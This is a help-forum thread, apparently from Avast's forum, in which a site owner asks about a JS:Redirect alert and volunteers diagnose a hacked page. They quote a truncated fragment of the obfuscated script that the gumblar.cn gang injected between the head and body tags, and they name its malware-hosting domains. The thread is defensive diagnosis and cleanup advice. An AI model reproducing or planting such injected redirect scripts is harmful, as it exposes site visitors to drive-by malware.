Help

Avast detects on my web JS:Redirect J1 as a virus. How can i get it out?Is it harmfull?I dont want avast to detect it anymore.

Generally, avast detection is accurate in these cases.
Isn’t it an encrypted/obfuscated script or iframe?
Wasn’t the site hacked?
Maybe you should check the code.
Which is the url (edit the link to hxxp:\)?

Hi cizo,

What is the site you try to go to with your browser, when avast flags this. When posting back put the url in this form wXw.this_is_this_site.com or like hxtp://this_is_this_site.com to make it non-clickable to the unaware and curious. Maybe we can find what malcode is on that particular site,

polonus

my site:www.e-buzz.ro/121.html
Is it possible someone hacked my site?

I don’t find relevant things on the code. Maybe I’m not prepared to find it.
Maybe it’s just the icon…

There is no way to tell how harmful it is as that entirely depends on where the redirect points to and what payload is on that site.

To get rid of the avast alerts you are invariably going to have to clean your site and increase security on the site setup. As hacked sites (and this alert is an indication it has been hacked) are usually exploited because of content management software being out of date and vulnerable (PHP, SQL, WordPress, ftp, etc.).

Your site has been hacked, there is an obfuscated script tag just after the closing Head and before the opening Body tag, see image. I have modified it as it is essentially all on one line so it is easier to see.

Hi cizo,

Yes, this is the hidden inline script there:

^^(function(Vok){var otGVM='%';var gjYV9=('va!72!20a!3d!22Sc!72iptE!...6eg!69ne!22!2cb!3d!22Ver!73io!6e!...^^ 

You are a victim of the gumblar.cn gang
Of all the 95 pages that were tested on this site, 2 have been downloading and installing harmfull software without the site-owner’s permission. Malicious content consisting of 9 scripting exploits, also found on the 12th of this month and the 20th of this month.
Malware is being hosted on two domains, e.g. gumblar.cn/, martuz.cn/.

This site was hosted on 1 network(s) including AS41635 (LIVESOFT),

For further info on the gumblar malware, re: http://forum.avast.com/index.php?topic=45296.0

polonus